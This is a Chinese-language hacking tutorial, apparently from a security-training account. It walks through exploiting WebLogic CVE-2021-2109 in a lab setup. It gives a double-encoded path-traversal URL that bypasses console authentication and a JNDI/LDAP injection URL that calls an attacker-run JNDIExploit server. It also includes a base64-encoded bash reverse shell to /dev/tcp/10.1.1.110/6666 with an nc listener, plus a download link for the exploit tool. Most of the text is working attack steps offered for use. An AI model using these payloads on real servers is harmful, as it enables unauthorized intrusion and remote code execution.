Weblogic未授权访问以及LADP远程代码执行（CVE-2021-2109）

零基础学黑客，搜索公众号：白帽子左一

作者：掌控安全-逍遥子

1.影响版本：
WebLogic Server10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0

实验环境:
攻击机：kalilinux 10.1.1.10
靶机： 10.1.1.109

2.weblogic未授权访问：

对目标地址的7001端口直接访问

构造绕过授权url: ip:7001/console/css/%252e%252e%252f/consolejndi.portal 其中%252e%252e%252f是…/的二次url编码。成功访问到控制台，如果第一次未成功需要进行刷新。

此处存在weblogic的未授权访问，该版本受到影响。

3.远程代码执行
a.
启动需要攻击使用的ldap脚本 java -jar JNDIExploit.jar -i ip
下载地址：github的链接已经失效，我放在附件的位置。

配合WebLogic未授权漏洞进行代码执行：
/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://10.1.1;110:1389/Basic/WeblogicEcho;AdminServer%22)
注意：使用ldap的第三个分隔符使用的是；，不是.
构造一个传参为cmd，即为我们执行的命令。

b.
另外开启一个终端，运行漏洞的poc。设置响应的参数，看到成功执行，并且获取到了shell。

c.利用漏洞生成反弹shell。
将bash反弹命令bash -i >&/dev/tcp/10.1.1.110/6666 0>&1进行base64编码转换：bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xLjEuMTEwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}
然后使用nc对本地的端口进行一个监听。

成功获取到shell

链接：https://pan.baidu.com/s/10DyEYAFrCbtQ5wKTAy_7-g
提取码：zkaq